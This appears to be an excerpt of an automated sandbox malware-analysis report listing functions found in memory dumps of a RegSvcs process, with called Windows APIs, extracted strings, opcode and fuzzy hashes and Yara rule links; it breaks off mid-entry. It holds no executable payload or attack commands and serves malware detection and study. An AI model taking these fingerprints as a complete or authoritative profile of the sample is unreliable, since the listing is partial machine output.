Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Function 050F5D70 Relevance: 5.2, Strings: 4, Instructions: 222
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 050F5FCB
, xrefs: 050F5E5D
Hbq, xrefs: 050F6031
Hbq, xrefs: 050F5FFE

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $Hbq$Hbq$Hbq
API String ID: 0-580995494
Opcode ID: dd8f5dff6a7f520f3e9e333588269fc44e7b99c4f2711bfeed769d40f1a88900
Instruction ID: f7e2d0a3cdf2112e711f7d0530e470e7382018fdb819baf82e88e70fe1c1c954
Opcode Fuzzy Hash: dd8f5dff6a7f520f3e9e333588269fc44e7b99c4f2711bfeed769d40f1a88900
Instruction Fuzzy Hash: 1B71D330B002149FCF699E78A85967E3BA7FF84360F248629EA169B3D0CF358C45C795

Function 050F5D61 Relevance: 5.2, Strings: 4, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 050F5FCB
, xrefs: 050F5E0D
Hbq, xrefs: 050F6031
Hbq, xrefs: 050F5FFE

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: $Hbq$Hbq$Hbq
API String ID: 0-580995494
Opcode ID: be87290bd306030ece6399ea80440bc638cb9be10cc7e1555f1cc6aa8ab0337a
Instruction ID: 48ce33cdd8bb3ff9cd531a8a90f02ea36f33074a45d3c592d1b6afb371e2f0a9
Opcode Fuzzy Hash: be87290bd306030ece6399ea80440bc638cb9be10cc7e1555f1cc6aa8ab0337a
Instruction Fuzzy Hash: 7351C230B002149FCB68AF78A81967E3BA7EF84360F244529EA16DB3D0DF358D45CB95

Function 050F3420 Relevance: 2.6, Strings: 2, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 050F35A9
PH^q, xrefs: 050F3598

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 35e0053c00c679e1992eb81110122fd4111154600e9eaac9bcc677e554c140a9
Instruction ID: 5752090facda91147c52e990f09eedd0405dcd6e88762ee4baf40c4c6e95681e
Opcode Fuzzy Hash: 35e0053c00c679e1992eb81110122fd4111154600e9eaac9bcc677e554c140a9
Instruction Fuzzy Hash: 9151B474E00208DFDB48DFA9E594AEDBBF2BF89311F109429E915AB364DB309946CF10

Function 050F2519 Relevance: 2.6, Strings: 2, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xbq, xrefs: 050F2556
Xbq, xrefs: 050F252D

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Xbq$Xbq
API String ID: 0-1243427068
Opcode ID: 43a397dc7e5685c65bf860dbd2c0c03cefd38d3144c54b31c6433847f411884e
Instruction ID: b0916c00be079fce1e5a205937483026e06b2e03b581d113081087e9032bca60
Opcode Fuzzy Hash: 43a397dc7e5685c65bf860dbd2c0c03cefd38d3144c54b31c6433847f411884e
Instruction Fuzzy Hash: F7315939B0422687CF589A79ADA837EA6DBBBC4710F184439DA03D3790DF74CC458791

Function 050F6661 Relevance: 2.6, Strings: 2, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8cq, xrefs: 050F6739
TJcq, xrefs: 050F6772

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: 8cq$TJcq
API String ID: 0-1920894394
Opcode ID: 89633e873bcc82817683719c5372b96c6be00c6664437c43a735e11f3119baa3
Instruction ID: 5beabfc9e2db91e49ce1fca6777cb10680bb154196a2af19b798749792c90dcd
Opcode Fuzzy Hash: 89633e873bcc82817683719c5372b96c6be00c6664437c43a735e11f3119baa3
Instruction Fuzzy Hash: 44310335B402098FCB45DFA8D584E9DBBF2FF88320F195594E605AB365CA31EC85CBA0

Function 050F6695 Relevance: 2.6, Strings: 2, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8cq, xrefs: 050F6739
TJcq, xrefs: 050F6772

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: 8cq$TJcq
API String ID: 0-1920894394
Opcode ID: 9ce96d3e83e0198ef2e531aa476a67684df35406c834a62a37799f2478667020
Instruction ID: 9170e5705526d3864668f9cd4f95d6aee580e203876b9a976dad10ed3963c7cc
Opcode Fuzzy Hash: 9ce96d3e83e0198ef2e531aa476a67684df35406c834a62a37799f2478667020
Instruction Fuzzy Hash: 93310635B402198FCB45DFA8C584E9DBBF2EF88320F155594E605AB365CA71EC85CBA0

Function 064D2608 Relevance: 1.7, APIs: 1, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1fd54f42156bcfb25458f05484d2d42cf3498f87b3bc1061c1b25175d368004c
Instruction ID: fcb1a3c7586acbb281b9d0ac9064c16f473b282216167b0c10ce112041159241
Opcode Fuzzy Hash: 1fd54f42156bcfb25458f05484d2d42cf3498f87b3bc1061c1b25175d368004c
Instruction Fuzzy Hash: 9B913170E00B099FDB64DF6AD490A9ABBF1BF48300F10892AE546A7750DB70E945CF94

Function 064D4D46 Relevance: 1.7, APIs: 1, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 064D4F11

Memory Dump Source

Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 1d54ce311f4aa125a15abc50b47ca501901b24172394203bf428496d7aae2fbd
Instruction ID: 9963f3f6c37a62e3cdd32a2c2967dd297876a074b8a3c3d6e23c931c5a7b5b76
Opcode Fuzzy Hash: 1d54ce311f4aa125a15abc50b47ca501901b24172394203bf428496d7aae2fbd
Instruction Fuzzy Hash: D6718BB4D00258DFDF60CFA9C984ADEBBF1BF09314F1491AAE858A7221D730A985CF45

Function 064D2A94 Relevance: 1.7, APIs: 1, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 064D4F11

Memory Dump Source

Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 19a679822fed597e07e345873bfb00c5c57d5a6fc5fd35391fc1cf9857031ab5
Instruction ID: 596d121c51a8bd703fc6a3d1d7d5a142b20c5a19a54314d189cf47f9edeaa06f
Opcode Fuzzy Hash: 19a679822fed597e07e345873bfb00c5c57d5a6fc5fd35391fc1cf9857031ab5
Instruction Fuzzy Hash: 09718BB4D00258DFDF60CFA9D984ADEBBF1BB09304F1491AAE818A7221D730A985CF45

Function 064D2BE4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 064D7581

Memory Dump Source

Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 664acf8d999b5004ab2d8936c9d015e3ea3eb9ba6c282c858ba44286326397ef
Instruction ID: f04407d377beb9174985027b665ca5c2bc152aed73d5cb61516eb1715600a5ce
Opcode Fuzzy Hash: 664acf8d999b5004ab2d8936c9d015e3ea3eb9ba6c282c858ba44286326397ef
Instruction Fuzzy Hash: 074128B5900309CFDB54CF99C458AAAFBF5FB88314F24C45AE519AB321D734A841CFA5

Function 0293F458 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0293F4FC

Memory Dump Source

Source File: 00000007.00000002.2902088694.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2930000_RegSvcs.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d587b4ab5426e297e12cb18c07f0d6590f0c4d0c3177ac206c41e1696d9910fc
Instruction ID: a424e31caa0c7e5733ec957e2288f9f65b32a8e3b881773998751a471d33e0a6
Opcode Fuzzy Hash: d587b4ab5426e297e12cb18c07f0d6590f0c4d0c3177ac206c41e1696d9910fc
Instruction Fuzzy Hash: 8131A7B9D002589FCF10CFA9D984AEEFBF4BB49310F20942AE818B7210D735A945CF58

Function 064D15D0 Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 064D288A

Memory Dump Source

Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a63e1e344e51a68d6b367b58c66b7666d783259c8b497ff1aeccf90e98f71b15
Instruction ID: 4a07a09d6657953094d48c173b8f15b1a542d870e8f5884bf72c2aec55b8ce62
Opcode Fuzzy Hash: a63e1e344e51a68d6b367b58c66b7666d783259c8b497ff1aeccf90e98f71b15
Instruction Fuzzy Hash: E331CAB4D00219DFCB14CFAAD484ADEFBF4AB49310F14906AE918B7320D374AA41CFA4

Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80

SysAllocString.OLEAUT32 ref: 00401898

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Function 050F001F Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

LR^q, xrefs: 050F007C

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 34a2d8bc86964afe9ef0d7f70edf7b71c1bb06ad9669c16cde859870c66fee0d
Instruction ID: 49d8770de458564f110f1d88a116eadfbe7df264bd730f7c64b9fc13a26acb90
Opcode Fuzzy Hash: 34a2d8bc86964afe9ef0d7f70edf7b71c1bb06ad9669c16cde859870c66fee0d
Instruction Fuzzy Hash: E2A1C774A40349CFCB05EFA8E984A9EBBB2FF45305B104A65D405EB369DB306D89CF90

Function 050F0040 Relevance: 1.5, Strings: 1, Instructions: 202COMMON

Download Yara Rule

Strings

LR^q, xrefs: 050F007C

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: dfa587d31a1ab94e1e812001f5e7b29246841aaa401c1f0618affdc265799964
Instruction ID: 0fed912ca70c5bf3a193dbd92e465659570222e5a06c4612e1220fe2bcf9ddca
Opcode Fuzzy Hash: dfa587d31a1ab94e1e812001f5e7b29246841aaa401c1f0618affdc265799964
Instruction Fuzzy Hash: 38A19774E40209CFCB05EFA8E984A9EBBB2FF49305B105A25D415AB369DB706D85CF90

Function 050F6A28 Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

Hbq, xrefs: 050F6B2D

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Hbq
API String ID: 0-1245868
Opcode ID: 7cb06202673ac1b68abee8409ef1441fbb9a6cdcb0bfc115ce5519dfdbe00fa1
Instruction ID: 96a122bd626598dffbd551269501484d8c02ba8cccc34c49af009d1cdbcab12d
Opcode Fuzzy Hash: 7cb06202673ac1b68abee8409ef1441fbb9a6cdcb0bfc115ce5519dfdbe00fa1
Instruction Fuzzy Hash: 2541C431B042089FCB48AF78D8596AE7FF6EF85300F2484BAE605D7791DE358D058760

Function 050F6BD8 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

Hbq, xrefs: 050F6C36

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Hbq
API String ID: 0-1245868
Opcode ID: e5c616e78faa73f90a3d3ba90a69b01ee56d07855e898b0ac2629c3718ba8741
Instruction ID: 63c148421442830acab0761e2f138f0116efe483f1af129453dd25b26d3c5703
Opcode Fuzzy Hash: e5c616e78faa73f90a3d3ba90a69b01ee56d07855e898b0ac2629c3718ba8741
Instruction Fuzzy Hash: 3421E4317042489FC708EB68D955AAE7BAAFF85300F24806AE945DB791DE358D06C791

Function 050F61A0 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

4'^q, xrefs: 050F6202

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: afe54d4604a33d9da433127b953c334a0a2e62fab2322785dc40df681ec2c5a6
Instruction ID: dbdaa5a0cca095d4e7708577e25b2ff113032f04b442495aca4d17f0c9337157
Opcode Fuzzy Hash: afe54d4604a33d9da433127b953c334a0a2e62fab2322785dc40df681ec2c5a6
Instruction Fuzzy Hash: 1721A130B001049FCB44EBB9E999B9EBBE2FF84304F1486A9D10CDB765DB759E498B41

Function 0293F728 Relevance: 1.3, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0293F7A6

Memory Dump Source

Source File: 00000007.00000002.2902088694.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2930000_RegSvcs.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b2c548668983cc82acbf20cd2464c566c1a96c35321ccf0b5b95d5cd90bceeb3
Instruction ID: a856539154e5fba43b9a4d3e298cd744229222ae7835146b77b848fe372b71b7
Opcode Fuzzy Hash: b2c548668983cc82acbf20cd2464c566c1a96c35321ccf0b5b95d5cd90bceeb3
Instruction Fuzzy Hash: AB31AAB5D012189FCB14CFAAD984ADEFBF4AB49310F14942AE815B7310C734A941CF98

Function 050F3CC0 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7c446c75dcf434adf31f97d99f3fcec184117519c7ee8b8cdcef45adca9031a
Instruction ID: 1199cf83ac616c804147c62be886ea76ff93c471f1b6f6623b8cfbf2ba92fce5
Opcode Fuzzy Hash: e7c446c75dcf434adf31f97d99f3fcec184117519c7ee8b8cdcef45adca9031a
Instruction Fuzzy Hash: DFF0F8308B57038FD3612B24AAAD36A7B64EB0B313B066F10A10A91051DF74412CCA75

Function 050F6D80 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a747d2f9626bea457c82185a9e3b1e28edb0805b57a273539dde7be66553cd3e
Instruction ID: 3e8225f2579a06187ee242b5dda01463558d19a6e22e42e848df64bceeafd19d
Opcode Fuzzy Hash: a747d2f9626bea457c82185a9e3b1e28edb0805b57a273539dde7be66553cd3e
Instruction Fuzzy Hash: 0341D5777046069FC7549EADEC44A6FBBEAFBC8324B14852EE625C7B50D632D8018750

Function 050F2A00 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46c53d97601eff92660a866acbe160ee8c3c9510748ceee2d619c41b2943850e
Instruction ID: 858c35f18bbd39f74b54d4287fe9a2c59e161713a849379d5781061f410d167c
Opcode Fuzzy Hash: 46c53d97601eff92660a866acbe160ee8c3c9510748ceee2d619c41b2943850e
Instruction Fuzzy Hash: F8418174E01209CFCB08DFAAE994A9DBBF2BF89310F109429E905B7364DB359945CF54

Function 050F4408 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc8841e37a4630db23660c02f3b12a5744c3d444b61c11a8e560ac14ddd304ad
Instruction ID: a5754ee37278292b4f579ffe8a016edf865fcbd4e4bc9b046efdd7045a3e2eac
Opcode Fuzzy Hash: cc8841e37a4630db23660c02f3b12a5744c3d444b61c11a8e560ac14ddd304ad
Instruction Fuzzy Hash: 6F31C1748B524A9FC2352F24A2AC66ABB75FF1FB137126E19E44AD18259F71006DCA10

Function 050F6090 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef60e14e83a7a2f80ee4b4a593447a9f3b614e16a1efb2a15e5b2f2953f84e37
Instruction ID: 86d2d33a91f32b2d3bbb1004b0a4f2ac420e20574d24ac6bb8bf2d230d7cc4eb
Opcode Fuzzy Hash: ef60e14e83a7a2f80ee4b4a593447a9f3b614e16a1efb2a15e5b2f2953f84e37
Instruction Fuzzy Hash: 502125757082108FCB58AF78E84992E3BFAFF8960071505A9D609CB782CE21EC45C761

Function 050F0D50 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95dcb05503bcc6af681f63ae099d853e1a33f217771c78a100ec7693affaaa2a
Instruction ID: 919e72160770c3e9788074f67c38c48bac9bb016ac8140b69d21dab6ce3749ad
Opcode Fuzzy Hash: 95dcb05503bcc6af681f63ae099d853e1a33f217771c78a100ec7693affaaa2a
Instruction Fuzzy Hash: 8321E075A00205AFCB24DF24D4509AE77BAFB892A4F50C41DD94A9B241DA34EA43CBD2

Function 0277D338 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2901433433.000000000277D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0277D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_277d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4c71abf3991e7227cd25a571c70e47dac56369cc4a298a000f45a34d35d19ea
Instruction ID: 74e63abbd929b3a9f61d2b3e92d5699cb2a6b81c5f7836af071961b236713c88
Opcode Fuzzy Hash: d4c71abf3991e7227cd25a571c70e47dac56369cc4a298a000f45a34d35d19ea
Instruction Fuzzy Hash: 282100B2604200DFDF25DF14D9C4B2ABFA5FF88314F24C5A9E9094B256C33AD426CBA1

Function 0277D600 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2901433433.000000000277D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0277D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_277d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 146d4d6a167177d76ce31ead582de3d167a286f352364ee3e0bfc3d2affbf5ec
Instruction ID: 36e4ec91f25a814a3ffe36d98fd0aa9f59763a73c46073e97e741f2a74ab0f6b
Opcode Fuzzy Hash: 146d4d6a167177d76ce31ead582de3d167a286f352364ee3e0bfc3d2affbf5ec
Instruction Fuzzy Hash: 632130B1500240DFDF24DF14DAC0B27BFA6EF88350F20C169E8098A216C336D856CAA2

Function 0278D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2901534849.000000000278D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0278D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_278d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60c6aa2b00b8a8fd9d97539930d98bc419ec5ca84923316c489f91f852c211e6
Instruction ID: 5f612d9441dc1efe572a884e8ab972836117c74ca9582c482ba914e8058caeb6
Opcode Fuzzy Hash: 60c6aa2b00b8a8fd9d97539930d98bc419ec5ca84923316c489f91f852c211e6
Instruction Fuzzy Hash: CC2126B1584204DFDB24EF24D9C4B26BFA5FB88314F24C66DD8094B296C33AD847CB62

Function 0278D007 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2901534849.000000000278D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0278D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_278d000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f181dd3a23a4631e35ff5fabe3aef57c33dc5c52266bb5b9daed796319519ca6
Instruction ID: 75ee08aa74390a258cafc2259fc0fa9106bdf2f5af60ee0e32506b2ab10dccb7
Opcode Fuzzy Hash: f181dd3a23a4631e35ff5fabe3aef57c33dc5c52266bb5b9daed796319519ca6
Instruction Fuzzy Hash: F82148715493C49FCB139B24D994B11BF71AB46214F29C5DBD8898F2A7C33A980ACB62

Function 050FBC34 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e830128af082aea0cc5f4dfa88fba4a4c9e2772eefa25ee99f5206504a13dda
